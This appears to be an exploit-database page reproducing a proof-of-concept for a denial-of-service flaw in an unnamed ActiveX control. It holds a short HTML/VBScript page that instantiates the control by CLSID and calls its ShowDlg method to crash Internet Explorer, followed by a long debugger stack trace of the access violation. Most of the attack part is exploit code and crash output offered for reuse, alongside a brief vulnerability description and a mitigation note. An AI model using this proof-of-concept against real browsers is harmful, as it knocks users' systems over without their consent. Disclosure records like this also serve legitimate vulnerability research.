header-logo
Suggest Exploit
vendor:
Not mentioned
by:
Not mentioned
5.5
CVSS
MEDIUM
Denial of Service (DoS)
Not mentioned
CWE
Product Name: Not mentioned
Affected Version From: Not mentioned
Affected Version To: Not mentioned
Patch Exists: No
Related CWE: Not mentioned
CPE: Not mentioned
Metasploit:
Other Scripts:
Platforms Tested: Not mentioned
Not mentioned

Test DoS Page Vulnerability

This vulnerability is a DoS vulnerability that can be exploited by an attacker to cause an access violation exception in the target system. The vulnerability is caused by a flaw in the target object's ShowDlg function, which can be triggered by passing a specially crafted argument. This results in a memory read attempt at the address 0x00000020, leading to an access violation exception (0xC0000005).

Mitigation:

To mitigate this vulnerability, it is recommended to apply patches or updates provided by the vendor. Additionally, input validation and sanitization techniques can be implemented to prevent the exploitation of this vulnerability.
Source

Exploit-DB raw data:

################################################################ 
#       .___             __          _______       .___        # 
#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
#        \/                  \/             \/                 # 
#                   ___________   ______  _  __                # 
#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
#                 \  \___|  | \/\  ___/\     /                 # 
#                  \___  >__|    \___  >\/\_/                  # 
#      est.2007        \/            \/   forum.darkc0de.com   # 
################################################################ 
# Greetz to all Darkc0de ,AI, AH,ICW Memebers
#Shoutz to r45c4l,j4ckh4x0r,silic0n,smith,baltazar,d3hydr8,FB1H2S, lowlz,Eberly,Sumit,zerocode,dalsim,7, Anirban , Anas, Navneet ,Varun, Dilip, Manish
#Special Thanks to r45c4l for allowing analysis on his product

#RegKey Safe for Script: False
#RegKey Safe for Init: False

#Implements IObjectSafety: True 

<html>
Test DoS Page
<object classid='clsid:CDF8A044-74AF-4045-AE13-D8AEDF802538' id='target' ></object>
<script language='vbscript'>
arg1=String(1, "A")
target.ShowDlg arg1 
</script>


Access violation exception (0xC0000005) when trying to read from memory location 0x00000020 in the thread below.

Function     					Arg 1     Arg 2     Arg 3   Source 
TargetControl+145d0     			0000000f     00000000     00000000    
mfc80u!CWnd::WindowProc+22 			0000000f     00000000     00000000    
mfc80u!AfxCallWndProc+a3    			00000000     003008d0     0000000f    
mfc80u!AfxWndProc+35     			003008d0     0000000f     00000000    
TargetControl!DllGetClassObject+c1a2     	003008d0     0000000f     00000000    
user32!InternalCallWinProc+28     		05987d5f     003008d0     0000000f    
user32!UserCallWinProcCheckWow+150     		03c6a110     05987d5f     003008d0    
user32!DispatchClientMessage+a3     		0068d978     0000000f     00000000    
user32!__fnDWORD+24     0013debc     		00000018     0068d978    
ntdll!KiUserCallbackDispatcher+13     		7e42aedc     003e08f6     0000005e    
user32!NtUserCallHwndLock+c     		003e08f6     0694e16c     0013df74    
mfc80u!CWnd::RunModalLoop+77     		00000004     4aba760d     00000000    
mfc80u!CDialog::DoModal+129     		4ab791a2     05540874     00000000    
TargetControl+ef9f     0694db40    		0000001c     00000004    
oleaut32!CTypeInfo2::Invoke+234     		03c7491c     0694db40     00000000    
TargetControl+11c58     0694db40     		00000001     00000409    
mshtml!COleSite::ContextInvokeEx+149     	0414b6f0     00000001     00000409    
mshtml!COleSite::ContextThunk_InvokeEx+44     	0414b6f0     00000001     00000409    
vbscript!IDispatchExInvokeEx2+a9     		0003b8d8     0414ce50     00000001    
vbscript!IDispatchExInvokeEx+56     		0003b8d8     0414ce50     00000001    
vbscript!InvokeDispatch+101     		0003b8d8     0003b990     00000001    
vbscript!InvokeByName+42     			0003b8d8     0414ce50     00000001    
vbscript!CScriptRuntime::RunNoEH+234c     	0013e6a4     4aab5064     00000000    
vbscript!CScriptRuntime::Run+62     		0013e6a4     0003fd08     0003b8d8    
vbscript!CScriptEntryPoint::Call+51     	0013e6a4     00000000     00000000    
vbscript!CSession::Execute+c8     		0003fd08     0013e888     00000000    
vbscript!COleScript::ExecutePendingScripts+144  0013e888     0013e868     0003e454    
vbscript!COleScript::ParseScriptTextCore+243    0414cd54     0414a394     00000000    
vbscript!COleScript::ParseScriptText+2b     	0003e454     0414cd54     0414a394    
mshtml!CScriptCollection::ParseScriptText+1da   0414ca90     73301e34     00000000    
mshtml!CScriptElement::CommitCode+1e1     	00000000     00000000     00000000    
mshtml!CScriptElement::Execute+a4     		0414a520     06194d97     00000000    
mshtml!CHtmParse::Execute+41     		0414a5e0     0414a520     7dcc4b65    
mshtml!CHtmPost::Broadcast+d     		7dcc4b83     06194d97     0414a520    
mshtml!CHtmPost::Exec+32b     			06194d97     0414a520     04140810    
mshtml!CHtmPost::Run+12     			06194d97     04140810     06194ccf    
mshtml!PostManExecute+51     			04140810     06194d97     0414a520    
mshtml!PostManOnTimer+76     			00250938     00000113     00001003    
user32!InternalCallWinProc+28     		7dcfb9d8     00250938     00000113    
user32!UserCallWinProc+f3     			00000000     7dcfb9d8     00250938    
user32!DispatchMessageWorker+10e     		0013eb90     00000000     0013eb78    
user32!DispatchMessageW+f     			0013eb90     00000000     00163468    
browseui!TimedDispatchMessage+33     		0013eb90     0013ee98     00000000    
browseui!BrowserThreadProc+336     		00162ca8     0013ee98     00162ca8    
browseui!BrowserProtectedThreadProc+50     	00162ca8     00162ca8     00000000    
browseui!SHOpenFolderWindow+22c     		00162ca8     00000000     00000000    
shdocvw!IEWinMain+133     			001523ba     00000001     0140d0b8    
iexplore!WinMainT+2de     			00400000     00000000     001523ba    
iexplore!_ModuleEntry+99     			0140d0b8     00000018     7ffdf000    
kernel32!BaseProcessStart+23     		00402451     00000000     78746341

Navigation

Suggest Exploit

Services By CQR